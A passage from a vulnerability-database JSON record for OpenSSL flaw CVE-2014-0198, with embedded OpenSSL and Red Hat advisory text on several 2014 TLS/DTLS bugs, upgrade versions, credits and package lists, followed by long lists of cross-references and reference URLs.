OpenSSL on 9th May 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nDTLS invalid fragment vulnerability (CVE-2014-0195)\n====================================================\n\nA buffer overrun attack can be triggered by sending invalid DTLS fragments\nto an OpenSSL DTLS client or server. This is potentially exploitable to\nrun arbitrary code on a vulnerable client or server. \n\nOnly applications using OpenSSL as a DTLS client or server affected. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. \n\nThanks to J\u00fcri Aedla for reporting this issue. This issue was\nreported to OpenSSL on 23rd April 2014 via HP ZDI. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. This flaw\nonly affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is\nenabled, which is not the default and not common. \n\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThis issue was reported in public. The fix was developed by\nMatt Caswell of the OpenSSL development team. \n\nSSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298)\n===============================================================================\n \nA race condition in the ssl3_read_bytes function can allow remote\nattackers to inject data across sessions or cause a denial of service. \nThis flaw only affects multithreaded applications using OpenSSL 1.0.0\nand 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the\ndefault and not common. \n\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThis issue was reported in public. \n\nAnonymous ECDH denial of service (CVE-2014-3470)\n================================================\n\nOpenSSL TLS clients enabling anonymous ECDH ciphersuites are subject to a\ndenial of service attack. \n\nOpenSSL 0.9.8 users should upgrade to 0.9.8za\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThanks to Felix Gr\u00f6bert and Ivan Fratri\u0107 at Google for discovering this\nissue. This issue was reported to OpenSSL on 28th May 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nOther issues\n============\n\nOpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for\nCVE-2014-0076: Fix for the attack described in the paper \"Recovering\nOpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack\"\nReported by Yuval Yarom and Naomi Benger. This issue was previously\nfixed in OpenSSL 1.0.1g. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttp://www.openssl.org/news/secadv_20140605.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. Relevant releases/architectures:\n\nRed Hat Storage Server 2.1 - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. (CVE-2014-0195)\n\nMultiple flaws were found in the way OpenSSL handled read and write buffers\nwhen the SSL_MODE_RELEASE_BUFFERS mode was enabled. A specially crafted DTLS handshake packet could cause\na DTLS client using OpenSSL to crash. A specially\ncrafted handshake packet could cause a TLS/SSL client that has the\nanonymous ECDH cipher suite enabled to crash. (CVE-2014-3470)\n\nRed Hat would like to thank the OpenSSL project for reporting these issues. \nUpstream acknowledges KIKUCHI Masashi of Lepidum as the original reporter\nof CVE-2014-0224, J\u00fcri Aedla as the original reporter of CVE-2014-0195,\nImre Rad of Search-Lab as the original reporter of CVE-2014-0221, and Felix\nGr\u00f6bert and Ivan Fratri\u0107 of Google as the original reporters of\nCVE-2014-3470. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Package List:\n\nRed Hat Storage Server 2.1:\n\nSource:\nopenssl-1.0.1e-16.el6_5.14.src.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.14.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc", "sources": [ { "db": "NVD", "id": "CVE-2014-0198" }, { "db": "BID", "id": "67193" }, { "db": "VULMON", "id": "CVE-2014-0198" }, { "db": "PACKETSTORM", "id": "126710" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "126532" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127326" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "129218" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "126930" } ], "trust": 2.34 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0198", "trust": 3.2 }, { "db": "JUNIPER", "id": "JSA10629", "trust": 2.0 }, { "db": "BID", "id": "67193", "trust": 2.0 }, { "db": "MCAFEE", "id": "SB10075", "trust": 2.0 }, { "db": "SECUNIA", "id": "59413", "trust": 1.7 }, { "db": "SECUNIA", "id": "58337", "trust": 1.7 }, { "db": "SECUNIA", "id": "59284", "trust": 1.7 }, { "db": "SECUNIA", "id": "59990", "trust": 1.7 }, { "db": "SECUNIA", "id": "60049", "trust": 1.7 }, { "db": "SECUNIA", "id": "58939", "trust": 1.7 }, { "db": "SECUNIA", "id": "60066", "trust": 1.7 }, { "db": "SECUNIA", "id": "59437", "trust": 1.7 }, { "db": "SECUNIA", "id": "59514", "trust": 1.7 }, { "db": "SECUNIA", "id": "59491", "trust": 1.7 }, { "db": "SECUNIA", "id": "58667", "trust": 1.7 }, { "db": "SECUNIA", "id": "58713", "trust": 1.7 }, { "db": "SECUNIA", "id": "61254", "trust": 1.7 }, { "db": "SECUNIA", "id": "59301", "trust": 1.7 }, { "db": "SECUNIA", "id": "59655", "trust": 1.7 }, { "db": "SECUNIA", "id": "59449", "trust": 1.7 }, { "db": "SECUNIA", "id": "59669", "trust": 1.7 }, { "db": "SECUNIA", "id": "59374", "trust": 1.7 }, { "db": "SECUNIA", "id": "59264", "trust": 1.7 }, { "db": "SECUNIA", "id": "59438", "trust": 1.7 }, { "db": "SECUNIA", "id": "59310", "trust": 1.7 }, { "db": "SECUNIA", "id": "59450", "trust": 1.7 }, { "db": "SECUNIA", "id": "59306", "trust": 1.7 }, { "db": "SECUNIA", "id": "59529", "trust": 1.7 }, { "db": "SECUNIA", "id": "59287", "trust": 1.7 }, { "db": "SECUNIA", "id": "59784", "trust": 1.7 }, { "db": "SECUNIA", "id": "59398", "trust": 1.7 }, { "db": "SECUNIA", "id": "59202", "trust": 1.7 }, { "db": "SECUNIA", "id": "59190", "trust": 1.7 }, { "db": "SECUNIA", "id": "59162", "trust": 1.7 }, { "db": "SECUNIA", "id": "59666", "trust": 1.7 }, { "db": "SECUNIA", "id": "59490", "trust": 1.7 }, { "db": "SECUNIA", "id": "59440", "trust": 1.7 }, { "db": "SECUNIA", "id": "59721", "trust": 1.7 }, { "db": "SECUNIA", "id": "58945", "trust": 1.7 }, { "db": "SECUNIA", "id": "59282", "trust": 1.7 }, { "db": "SECUNIA", "id": "59163", "trust": 1.7 }, { "db": "SECUNIA", "id": "58977", "trust": 1.7 }, { "db": "SECUNIA", "id": "59300", "trust": 1.7 }, { "db": "SECUNIA", "id": "59126", "trust": 1.7 }, { "db": "SECUNIA", "id": "59342", "trust": 1.7 }, { "db": "SECUNIA", "id": "58714", "trust": 1.7 }, { "db": "SECUNIA", "id": "60571", "trust": 1.7 }, { "db": "SECUNIA", "id": "59525", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-234763", "trust": 1.7 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2148", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201405-057", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-14-198-03G", "trust": 0.4 }, { "db": "DLINK", "id": "SAP10045", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10643", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03F", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03B", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03C", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03D", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-0198", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126710", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127213", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126532", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127807", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127630", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140720", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127326", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127045", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129218", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126961", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127265", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126930", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0198" }, { "db": "BID", "id": "67193" }, { "db": "PACKETSTORM", "id": "126710" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "126532" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127326" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "129218" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "126930" }, { "db": "CNNVD", "id": "CNNVD-201405-057" }, { "db": "NVD", "id": "CVE-2014-0198" } ] }, "id": "VAR-201405-0244", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.416493127826087 }, "last_update_date": "2024-07-23T22:12:00.239000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "ssl-s3_pkt.c", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=49771" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/07/10/fireeye_patches_os_torpedo_exploitdb_disclosure/" }, { "title": "Debian Security Advisories: DSA-2931-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=828d990b615b0dfea284a3530e6fe590" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2192-1" }, { "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0198 Null pointer dereference bug in OpenSSL 1.0.1g and earlier", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=94b6140bb563b66b3bcd98992e854bf3" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=b92b65104373bc8476811ff1b99cd369" }, { "title": "Red Hat: CVE-2014-0198", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-0198" }, { "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=07d14df4883f21063a053cea8d2239c6" }, { "title": "Amazon Linux AMI: ALAS-2014-349", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-349" }, { "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49" }, { "title": "Symantec Security Advisories: SA80 : OpenSSL Security Advisory 05-Jun-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=dd4667746d163d08265dfdd4c98e4201" }, { "title": "Debian CVElist Bug Report Logs: virtualbox: CVE-2014-6588 CVE-2014-6589 CVE-2014-6590 CVE-2014-6595 CVE-2015-0418 CVE-2015-0427", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=eee4d8c3e2b11de5b15ee65d96af6c60" }, { "title": "Citrix Security Bulletins: Citrix Security Advisory for OpenSSL Vulnerabilities (June 2014)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=afbd3a710e98424e558b1b21482abad6" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0198" }, { "db": "CNNVD", "id": "CNNVD-201405-057" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-476", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0198" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.openssl.org/news/secadv_20140605.txt" }, { "trust": 2.0, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140605-openssl" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676035" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677695" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676655" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677828" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676062" }, { "trust": 2.0, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10075" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676419" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678167" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673137" }, { "trust": 2.0, "url": "http://www.fortiguard.com/advisory/fg-ir-14-018/" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095757" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095756" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095755" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095754" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683332" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677836" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676879" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676529" }, { "trust": 2.0, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15329.html" }, { "trust": 2.0, "url": "http://support.citrix.com/article/ctx140876" }, { "trust": 2.0, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=kb29195" }, { "trust": 2.0, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629" }, { "trust": 2.0, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory9.asc" }, { "trust": 1.8, "url": "http://security.gentoo.org/glsa/glsa-201407-05.xml" }, { "trust": 1.8, "url": "http://advisories.mageia.org/mgasa-2014-0204.html" }, { "trust": 1.7, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1093837" }, { "trust": 1.7, "url": "http://www.openbsd.org/errata55.html#005_openssl" }, { "trust": 1.7, "url": "https://rt.openssl.org/ticket/display.html?user=guest\u0026pass=guest\u0026id=3321" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2014-05/msg00036.html" }, { "trust": 1.7, "url": "http://www.debian.org/security/2014/dsa-2931" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2014-05/msg00037.html" }, { "trust": 1.7, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa80" }, { "trust": 1.7, "url": "http://www.blackberry.com/btsc/kb36051" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59438" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59301" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59450" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59491" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59721" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59655" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59162" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58939" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59666" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59126" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59490" }, { "trust": 1.7, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345106.htm" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59514" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677527" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59669" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59413" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59300" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59342" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60049" }, { "trust": 1.7, "url": "http://puppetlabs.com/security/cve/cve-2014-0198" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60066" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59990" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60571" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59784" }, { "trust": 1.7, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2014/dec/23" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140431828824371\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=141658880509699\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140448122410568\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140621259019789\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140544599631400\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140389274407904\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140904544427729\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140389355508263\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140752315422991\u0026w=2" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05301946" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00016.html" }, { "trust": 1.7, "url": "https://www.novell.com/support/kb/doc.php?id=7015271" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020163" }, { "trust": 1.7, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0006.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/67193" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:080" }, { "trust": 1.7, "url": "http://www.ibm.com/support/docview.wss?uid=swg24037783" }, { "trust": 1.7, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 1.7, "url": "http://secunia.com/advisories/61254" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59529" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59525" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59449" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59440" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59437" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59398" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59374" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59310" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59306" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59287" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59284" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59282" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59264" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59202" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59190" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59163" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58977" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58945" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58714" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58713" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58667" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58337" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.7, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-234763.pdf" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/" }, { "trust": 0.5, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.5, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.5, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076" }, { "trust": 0.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03g" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05301946" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_0198_buffer_errors" }, { "trust": 0.3, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10045" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=kb29217" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list\u0026showdraft=false" }, { "trust": 0.3, "url": "http://www.cerberusftp.com/products/releasenotes.html" }, { "trust": 0.3, "url": "http://blogs.citrix.com/2014/06/06/citrix-security-advisory-for-openssl-vulnerabilities-june-2014/" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2014/aug/att-93/esa-2014-079.txt" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10643\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://anoncvs.estpak.ee/cgi-bin/cgit/openbsd-src/commit/lib/libssl?id=e76e308f1fab2253ab5b4ef52a1865c5ffecdf21" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2014/may/67" }, { "trust": 0.3, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.5/common/005_openssl.patch.sig" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181245" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181099" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180978" }, { "trust": 0.3, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-198-03" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03d" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.3, "url": "http://btsc.webapps.blackberry.com/btsc/viewdocument.do;jsessionid=98ec479ee69ccb916d2ea4b09943faf5?nocount=true\u0026externalid=kb36051\u0026sliceid=1\u0026cmd=\u0026forward=nonthreadedkc\u0026command=show\u0026kcid=kb36051\u0026viewe" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04355095" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04368264" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04347622" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04345210" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349175" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349789" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349897" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04378799" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04379485" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678356" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095940" }, { "trust": 0.3, "url": 